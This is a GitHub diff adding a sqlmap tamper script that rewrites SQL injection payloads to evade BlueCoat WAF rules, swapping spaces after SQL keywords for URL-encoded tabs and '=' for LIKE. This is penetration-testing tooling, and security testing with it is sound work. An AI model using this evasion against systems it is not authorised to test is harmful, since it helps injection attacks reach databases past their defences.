File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change 1+ #!/usr/bin/env python
2+
3+ """
4+ Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/)
5+ See the file 'doc/COPYING' for copying permission
6+ """
7+
8+ import os
9+ import re
10+
11+ from lib .core .common import singleTimeWarnMessage
12+ from lib .core .enums import DBMS
13+ from lib .core .enums import PRIORITY
14+
15+ __priority__ = PRIORITY .LOW
16+
17+ def dependencies ():
18+ singleTimeWarnMessage ("tamper script '%s' is only meant to be run against %s" % (os .path .basename (__file__ ).split ("." )[0 ], DBMS .MYSQL ))
19+
20+ def process (match ):
21+ word = match .group ()
22+ word = "%sLIKE%s" % (" " if word [0 ] != " " else "" , " " if word [- 1 ] != " " else "" )
23+ return word
24+
25+ def tamper (payload , headers = None ):
26+ """
27+ First Replaces the space after 'select ' with a valid random blank character.
28+ Then replace = with like
29+
30+ Example:
31+ * Input: SELECT id FROM users where id = 1
32+ * Output: SELECT%09id FROM users where id like 1
33+
34+ Requirement:
35+ * MySQL, Bluecoat SGos with Waf activated as documented in
36+ https://kb.bluecoat.com/index?page=content&id=FAQ2147
37+
38+ Tested against:
39+ * MySQL 5.1, SGos Rules
40+
41+ Notes:
42+ * Useful to bypass BlueCoat recommanded Waf rule configuration
43+ """
44+
45+ # ASCII table:
46+ # TAB 09 horizontal TAB
47+ blanks = '%09'
48+ retVal = payload
49+
50+ if payload :
51+ for commands in ['SELECT' ,'UPDATE' ,'INSERT' ,'DELETE' ]:
52+ retVal = retVal .replace (commands + ' ' , commands + blanks )
53+ retVal = re .sub (r"\s*=\s*" , lambda match : process (match ), retVal )
54+
55+ return retVal
You can’t perform that action at this time.
0 commit comments